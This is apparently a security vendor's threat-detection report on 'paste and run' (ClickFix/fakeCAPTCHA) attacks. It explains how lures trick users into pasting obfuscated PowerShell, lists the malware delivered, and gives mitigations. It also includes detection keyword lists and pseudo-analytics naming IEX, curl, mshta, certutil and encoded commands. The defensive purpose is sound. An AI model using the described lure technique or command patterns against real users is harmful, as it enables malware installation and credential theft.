Malicious Copy and Paste
In many ways, 2025 was the year of a social engineering attack known as “ClickFix” or “paste and run” that begins with tricking users to copy and paste malicious code.
#8
Overall Rank
13.9%
Customers Affected
448
Threats Detected
Why do adversaries use malicious copy and paste?
Attacks leveraging malicious copy and paste can take several forms but at its core, this technique relies on a user copying and pasting code to their system’s command-line interface, taking the form of CAPTCHA-style messages or “fix” requests in order for the adversary to gain execution. While this technique goes by several names— including ClickFix and fakeCAPTCHA—Red Canary Intelligence uses the term “paste and run” to describe these attacks internally.
Paste and run, step by step
Users should know that no legitimate process will prompt them to use shortcuts that include the Windows button and ‘R’ or ‘X’and by pasting unknown scripts or commands.
This technique takes advantage of a user’s digital conditioning—instead of feeling tricked, users believe they’re fixing a technical issue—helping the adversary bypass mitigations designed to protect users and circumventing mechanisms that block malicious actions.
While plenty of threat actors employed this technique in 2024, Red Canary observed paste-and-run attacks increase in scope and scale in 2025. The technique has grown in popularity over the past year because it’s been extremely effective.
How do adversaries use malicious copy and paste?
Paste and run has quickly become the second most popular initial access vector for cyber attacks, trailing only traditional phishing. This technique, which traditionally downloads follow-on payloads from adversary infrastructure, relies heavily on urgency. The adversary is trying to entice the user into verifying or fixing something by typing a command into a terminal, run dialog box, or PowerShell. The lures can often feel time-sensitive and users may feel like they need to act fast to solve the problem.
Red Canary has seen lures take several forms, including ones in which:
- The user has to “fix” their access to a document, website, or software installation/update by following the instructions in the paste-and-run lure.
- A CAPTCHA-style lure prompting the user to follow given instructions to prove they are a human in order to gain access to a document, website, or installation/update process.
In most scenarios, once users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.” These typically consist of running a shortcut to open the Windows run dialog, pasting the unknowingly-copied PowerShell command, and pushing enter. By following the “verification steps,” the user inadvertently runs the command and additional commands will reach out and download malware or tools.
Over the last year, Red Canary has detected adversaries leveraging this technique to deliver a wide range of threats, including but not limited to:
- Information stealers like Atomic and Odyssey Stealer
- RMM tools
- Scarlet Goldfinch
- Mocha Manakin
- NetSupport Manager
- LummaC2
- Vidar
- XMRig
- HijackLoader
- Arechclient2
- KongTuke
- Legion Loader
Given how successful they’ve been, it shouldn’t be a surprise that paste-and-run lures have reportedly taken other forms as well, including fake error messages from malicious phishing attachments as well as through fake Windows Update screens.
Variations
A popular paste-and-run variant seen in 2025 called “FileFix” relies on leveraging the Windows File Explorer address bar to execute commands. KongTuke, a traffic distribution system (TDS) that leverages compromised WordPress sites and the seventh most prevalent threat we observed last year, used both the fakeCAPTCHA and the FileFix version of paste and run in 2025.
While paste-and-run campaigns have largely affected Windows machines, they can also pose a risk to other operating systems. Some adversaries have used lures designed specifically for macOS users that encourage the user to open Spotlight, then macOS Terminal to execute malicious commands. For instance, in 2025, adversaries created fake websites that mimic trusted macOS dev tools like Homebrew to spread Odyssey and Atomic Stealer. These sites then prompt users to copy and paste seemingly benign installation commands into Terminal, which secretly downloads and executes the stealer.
One mitigation strategy is to ensure users are educated about how adversaries take advantage of their digital conditioning. Specifically, organizations should familiarize users with the forms that paste-and-run lures can take, including being presented with unexpected prompts to verify their humanity, update software, or fix an error by opening the terminal, PowerShell, or a run dialog box.
Users should know that no legitimate process will prompt them to use shortcuts that include the Windows button and R or X and by pasting (Ctrl + V) unknown scripts or commands.
Another mitigation strategy for the Windows version of paste and run is to implement a Group Policy Object (GPO) disabling access to the Run dialog as well as Windows hotkeys, preventing paste and run’s use of Windows+R or Windows+X, as well as paste (Ctrl + V).
While it could be difficult to implement in scale, organizations could also disable cmd.exe and powershell.exe execution for standard users, though due to the popularity and utility of these features, it does not seem this strategy has been widely adopted by enterprises. It’s worth noting that disabling cmd.exe and powershell.exe could also affect system functionality, as many legitimate Windows processes and third-party applications use them.
Note: The visibility sections in this report are mapped to MITRE ATT&CK data components.
Despite being one of the newer MITRE techniques—Malicious Copy and Paste was added to the MITRE ATT&CK Framework in April 2025—there are a handful of relevant data sources. Detection revolves around monitoring the destination of what’s being pasted and the ensuing execution of said code, along with any potential precursors.
Command: Command execution
This is the most direct data source. When a user pastes a command into a terminal (cmd.exe, powershell.exe, bash) it results in a command execution event.
Process: Process creation
The execution of a pasted command will often result in the creation of new processes (e.g., powershell.exe launching curl.exe, or a JavaScript payload in a browser console launching a new process via WMI or similar methods).
Network traffic
Monitoring network connection creation and content analysis can help detect any secondary payloads being downloaded by the executed command (e.g., using curl or wget) and command and control (C2) communications.
Clipboard data
Monitoring for access to or modification of the clipboard can detect the initial injection of a malicious command.
Windows Registry
The majority of paste-and-run attacks add a malicious entry to the RunMRU registry key (most recently used) registry key. Monitoring the RunMRU, which logs commands entered into the Windows Run dialog box (Win+R) can yield telemetry as well.
For command execution, administrators should examine the entire command-line string for patterns involving the following:
Invoke-ExpressionIEXwgetcurlmshta.exeregsvr32.execertutil.exe -decode- Base64-encoded strings
The parent process will be a shell or terminal (cmd.exe, powershell.exe, pwsh.exe, bash.exe, WindowsTerminal.exe).
Regarding process creation, defenders should monitor for the creation of suspicious executables, particularly unusual process trees in which a terminal spawns unexpected child processes, i.e., powershell.exe spawning rundll32.exe or mshta.exe.
The most effective detection analytics for malicious copy and paste will combine suspicious command-line arguments and process trees originating from interactive shells or browser processes.
Encoded PowerShell executing a command, establishing external network connections, and writing an executable to disk
The following pseudo-detection analytic looks for instances of powershell.exe executing an encoded command, establishing external network connections, and writing an executable to disk. These kinds of encoded commands are used by a number of threats, including paste and run:
process == (powershell.exe)
&&
deobfuscated_command_includes (' -e ' || ' -ec ' || ' -en ' || ' -enc ' || ' -enco ' || ' -encod ' || ' -encode ' || ' -encoded ' || ' -encodedc ' || ' -encodedco ' || ' -encodedcom ' || ' -encodedcomm ' || ' -encodedcomma ' || ' -encodedcomman ')
&&
has_external_netconn
&&
file_creation_includes ('exe')Explorer spawning msiexec with a command line containing a remote address
The following pseudo-detection analytic identifies explorer spawning msiexec with a command line containing a remote address. This could be leveraged to download a legitimate MSI file, but has also been used by threats like paste and run/fakeCAPTCHA to download remotely hosted malicious scripts and code.
process_parent == (explorer.exe)
&&
process == (msiexec)
&&
command_includes ('http:' || 'https:')PowerShell leveraging mshta utility to make external network connections
Red Canary has detected the information stealer LummaC2 delivered as a payload via paste-and-run attacks. In these, the PowerShell command leverages Mshta to download and execute a malicious payload from a command and control server. This continues to be one our easiest and highest-converting detection analytics.
process == ('mshta')
&&
command_includes ('http:' || 'https:')
Start testing your defenses against Malicious Copy and Paste using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
Getting started
The following tests offer a great starting point for organizations to validate their detection coverage for the Malicious Copy and Paste technique:
T1566.002 – Phishing: Spearphishing Link Atomic Test #1 – Paste-and-run technique
This atomic test simulates the paste-and-run technique where users are tricked into running malicious PowerShell commands by automating the Win+R command to open the Run dialog and input encoded PowerShell to execute calc.exe.
T1204.002 – User Execution: Malicious File Atomic Test #12 – ClickFix Campaign – Abuse RunMRU to launch mshta via PowerShell
This atomic test simulates a paste-and-run campaign by adding a malicious entry to the RunMRU registry key that launches mshta.exe with a remote payload. This technique relies on user interaction (Win+R + Enter) to trigger execution.
Review and repeat
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
- Were any of your actions detected?
- Were any of your actions blocked or prevented?
- Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.